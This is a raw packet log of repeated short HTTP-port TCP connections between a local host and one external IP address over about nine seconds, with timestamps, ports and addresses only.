Feb 7, 2023 19:59:13.485487938 CET	80	50168	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:13.485709906 CET	50168	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:13.589756966 CET	50168	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:13.590588093 CET	50169	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:13.652662039 CET	80	50169	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:13.652807951 CET	50169	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:13.653162956 CET	50169	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:13.653336048 CET	80	50168	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:13.653418064 CET	50168	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:13.714456081 CET	80	50169	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:13.716979980 CET	80	50169	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:13.717148066 CET	50169	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:13.824467897 CET	50169	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:13.828512907 CET	50170	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:13.885931969 CET	80	50169	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:13.886090040 CET	50169	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:13.887861967 CET	80	50170	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:13.887964010 CET	50170	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:13.888323069 CET	50170	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:13.947642088 CET	80	50170	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:13.950104952 CET	80	50170	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:13.950225115 CET	50170	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:14.058701038 CET	50170	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:14.062597990 CET	50171	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:14.119147062 CET	80	50170	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:14.119335890 CET	50170	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:14.124732971 CET	80	50171	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:14.124907970 CET	50171	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:14.125363111 CET	50171	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:14.186557055 CET	80	50171	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:14.191518068 CET	80	50171	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:14.191694975 CET	50171	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:14.308845997 CET	50171	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:14.309531927 CET	50172	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:14.370079041 CET	80	50172	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:14.370187998 CET	80	50171	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:14.370260954 CET	50172	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:14.370271921 CET	50171	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:14.371002913 CET	50172	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:14.431381941 CET	80	50172	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:14.433557987 CET	80	50172	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:14.433773041 CET	50172	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:14.542534113 CET	50172	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:14.543097973 CET	50173	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:14.603161097 CET	80	50172	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:14.603313923 CET	50172	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:14.604226112 CET	80	50173	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:14.604336977 CET	50173	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:14.605093956 CET	50173	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:14.666419983 CET	80	50173	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:14.668813944 CET	80	50173	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:14.669011116 CET	50173	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:14.777261972 CET	50173	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:14.777924061 CET	50174	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:14.838670969 CET	80	50174	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:14.838743925 CET	80	50173	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:14.838910103 CET	50173	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:14.838912010 CET	50174	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:14.839890957 CET	50174	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:14.900293112 CET	80	50174	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:14.902622938 CET	80	50174	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:14.902792931 CET	50174	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:15.012855053 CET	50174	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:15.013464928 CET	50175	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:15.073982000 CET	80	50174	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:15.074119091 CET	50174	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:15.074439049 CET	80	50175	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:15.074561119 CET	50175	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:15.074930906 CET	50175	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:15.136432886 CET	80	50175	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:15.139275074 CET	80	50175	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:15.139379025 CET	50175	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:15.246964931 CET	50175	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:15.248754025 CET	50176	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:15.310915947 CET	80	50175	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:15.311002970 CET	50175	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:15.313956976 CET	80	50176	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:15.314071894 CET	50176	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:15.314801931 CET	50176	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:15.378951073 CET	80	50176	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:15.381174088 CET	80	50176	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:15.381259918 CET	50176	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:15.499753952 CET	50176	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:15.500432014 CET	50177	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:15.562874079 CET	80	50177	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:15.562927008 CET	80	50176	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:15.563044071 CET	50176	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:15.563268900 CET	50177	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:15.563616991 CET	50177	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:15.625041962 CET	80	50177	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:15.630712986 CET	80	50177	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:15.630925894 CET	50177	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:15.745692968 CET	50177	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:15.746352911 CET	50178	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:15.809204102 CET	80	50178	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:15.809267998 CET	80	50177	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:15.809348106 CET	50178	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:15.809401989 CET	50177	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:15.810185909 CET	50178	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:15.870459080 CET	80	50178	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:15.872658968 CET	80	50178	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:15.872991085 CET	50178	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:15.980494022 CET	50178	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:15.981323957 CET	50179	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:16.039853096 CET	80	50178	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:16.042785883 CET	80	50179	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:16.042979002 CET	50178	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:16.043004990 CET	50179	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:16.043395996 CET	50179	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:16.104737043 CET	80	50179	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:16.108273983 CET	80	50179	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:16.111021042 CET	50179	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:16.215389013 CET	50179	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:16.216923952 CET	50180	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:16.276941061 CET	80	50179	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:16.278172016 CET	80	50180	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:16.278196096 CET	50179	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:16.278255939 CET	50180	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:16.281335115 CET	50180	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:16.342631102 CET	80	50180	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:16.345597029 CET	80	50180	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:16.345905066 CET	50180	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:16.449695110 CET	50180	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:16.451562881 CET	50181	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:16.511217117 CET	80	50180	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:16.511377096 CET	50180	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:16.514266968 CET	80	50181	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:16.514432907 CET	50181	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:16.514939070 CET	50181	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:16.577637911 CET	80	50181	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:16.580110073 CET	80	50181	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:16.580214977 CET	50181	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:16.684355974 CET	50181	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:16.685331106 CET	50182	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:16.744833946 CET	80	50182	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:16.745050907 CET	50182	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:16.745810032 CET	50182	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:16.747004986 CET	80	50181	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:16.747111082 CET	50181	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:16.805253983 CET	80	50182	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:16.807717085 CET	80	50182	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:16.807858944 CET	50182	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:16.918080091 CET	50182	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:16.919064045 CET	50183	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:16.977731943 CET	80	50182	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:16.977878094 CET	50182	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:16.980439901 CET	80	50183	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:16.980561972 CET	50183	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:16.984626055 CET	50183	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:17.046236038 CET	80	50183	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:17.050165892 CET	80	50183	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:17.050328016 CET	50183	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:17.169150114 CET	50183	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:17.169845104 CET	50184	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:17.230107069 CET	80	50184	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:17.230257988 CET	50184	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:17.230643034 CET	80	50183	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:17.230712891 CET	50184	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:17.230719090 CET	50183	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:17.290848970 CET	80	50184	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:17.293034077 CET	80	50184	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:17.293135881 CET	50184	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:17.402488947 CET	50184	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:17.403274059 CET	50185	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:17.462941885 CET	80	50184	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:17.463114977 CET	50184	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:17.463607073 CET	80	50185	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:17.463721037 CET	50185	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:17.468502045 CET	50185	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:17.528933048 CET	80	50185	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:17.531395912 CET	80	50185	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:17.531462908 CET	50185	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:17.636982918 CET	50185	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:17.637860060 CET	50186	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:17.697472095 CET	80	50185	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:17.697576046 CET	50185	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:17.699076891 CET	80	50186	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:17.699199915 CET	50186	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:17.709490061 CET	50186	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:17.770797014 CET	80	50186	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:17.773711920 CET	80	50186	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:17.773819923 CET	50186	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:17.887625933 CET	50186	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:17.888536930 CET	50187	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:17.948882103 CET	80	50186	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:17.948901892 CET	80	50187	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:17.948960066 CET	50186	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:17.949032068 CET	50187	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:17.949465036 CET	50187	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:18.009912968 CET	80	50187	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:18.012347937 CET	80	50187	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:18.012448072 CET	50187	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:18.145169020 CET	50187	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:18.146003008 CET	50188	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:18.205708027 CET	80	50187	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:18.205833912 CET	50187	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:18.207281113 CET	80	50188	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:18.207406044 CET	50188	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:18.207900047 CET	50188	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:18.269269943 CET	80	50188	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:18.273184061 CET	80	50188	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:18.273253918 CET	50188	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:18.386406898 CET	50188	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:18.387219906 CET	50189	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:18.447942019 CET	80	50188	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:18.448108912 CET	50188	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:18.449759960 CET	80	50189	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:18.449908972 CET	50189	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:18.468588114 CET	50189	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:18.531116009 CET	80	50189	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:18.533440113 CET	80	50189	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:18.533513069 CET	50189	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:18.652827978 CET	50189	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:18.653667927 CET	50190	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:18.715621948 CET	80	50189	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:18.715718031 CET	50189	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:18.715826035 CET	80	50190	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:18.715929985 CET	50190	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:18.716316938 CET	50190	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:18.779386044 CET	80	50190	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:18.781754017 CET	80	50190	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:18.781867981 CET	50190	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:18.891402006 CET	50190	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:18.899363041 CET	50191	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:18.954091072 CET	80	50190	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:18.954216957 CET	50190	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:18.960613012 CET	80	50191	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:18.960746050 CET	50191	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:18.961060047 CET	50191	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:19.022126913 CET	80	50191	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:19.028016090 CET	80	50191	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:19.028135061 CET	50191	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:19.140507936 CET	50191	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:19.141293049 CET	50192	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:19.201724052 CET	80	50192	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:19.201800108 CET	80	50191	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:19.201864958 CET	50192	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:19.201972008 CET	50191	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:19.202749968 CET	50192	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:19.263531923 CET	80	50192	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:19.267288923 CET	80	50192	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:19.267421007 CET	50192	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:19.371781111 CET	50192	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:19.373441935 CET	50194	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:19.432478905 CET	80	50192	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:19.432625055 CET	50192	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:19.432704926 CET	80	50194	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:19.432841063 CET	50194	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:19.434056044 CET	50194	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:19.493371964 CET	80	50194	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:19.495491982 CET	80	50194	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:19.495640993 CET	50194	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:19.607621908 CET	50194	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:19.608356953 CET	50195	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:19.667207956 CET	80	50194	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:19.667402029 CET	50194	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:19.669975042 CET	80	50195	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:19.672857046 CET	50195	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:19.673213005 CET	50195	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:19.734555960 CET	80	50195	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:19.736771107 CET	80	50195	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:19.736941099 CET	50195	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:19.839993000 CET	50195	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:19.840847015 CET	50196	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:19.901606083 CET	80	50195	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:19.901700020 CET	50195	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:19.902442932 CET	80	50196	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:19.902826071 CET	50196	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:19.903167009 CET	50196	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:19.964648008 CET	80	50196	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:19.967077017 CET	80	50196	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:19.967200041 CET	50196	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:20.075017929 CET	50196	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:20.075908899 CET	50197	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:20.136703968 CET	80	50196	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:20.136804104 CET	50196	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:20.137243032 CET	80	50197	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:20.137331963 CET	50197	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:20.137779951 CET	50197	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:20.199039936 CET	80	50197	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:20.202398062 CET	80	50197	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:20.206909895 CET	50197	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:20.327303886 CET	50197	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:20.328011036 CET	50198	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:20.388988018 CET	80	50197	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:20.389200926 CET	50197	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:20.389462948 CET	80	50198	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:20.389647007 CET	50198	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:20.390515089 CET	50198	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:20.452759981 CET	80	50198	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:20.455348969 CET	80	50198	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:20.455461979 CET	50198	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:20.558873892 CET	50198	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:20.560345888 CET	50199	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:20.620794058 CET	80	50198	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:20.620858908 CET	80	50199	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:20.620995998 CET	50198	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:20.621041059 CET	50199	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:20.621767998 CET	50199	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:20.683296919 CET	80	50199	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:20.685482025 CET	80	50199	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:20.685726881 CET	50199	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:20.793723106 CET	50199	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:20.795223951 CET	50200	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:20.856273890 CET	80	50199	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:20.856432915 CET	50199	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:20.857335091 CET	80	50200	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:20.857446909 CET	50200	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:20.859042883 CET	50200	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:20.920681953 CET	80	50200	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:20.923166990 CET	80	50200	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:20.923315048 CET	50200	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:21.032963991 CET	50200	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:21.034049988 CET	50201	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:21.094769001 CET	80	50200	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:21.094898939 CET	50200	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:21.096837997 CET	80	50201	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:21.096988916 CET	50201	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:21.107449055 CET	50201	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:21.170835972 CET	80	50201	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:21.174144983 CET	80	50201	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:21.174272060 CET	50201	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:21.630201101 CET	50201	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:21.631083965 CET	50202	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:21.693571091 CET	80	50201	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:21.693690062 CET	50201	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:21.697772026 CET	80	50202	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:21.697890043 CET	50202	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:21.791440964 CET	50202	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:21.854115009 CET	80	50202	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:21.856420994 CET	80	50202	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:21.856517076 CET	50202	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:21.988173008 CET	50202	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:21.989038944 CET	50203	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:22.050564051 CET	80	50203	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:22.050730944 CET	50203	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:22.051018000 CET	80	50202	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:22.051106930 CET	50202	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:22.078648090 CET	50203	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:22.140264988 CET	80	50203	62.204.41.4	192.168.2.5
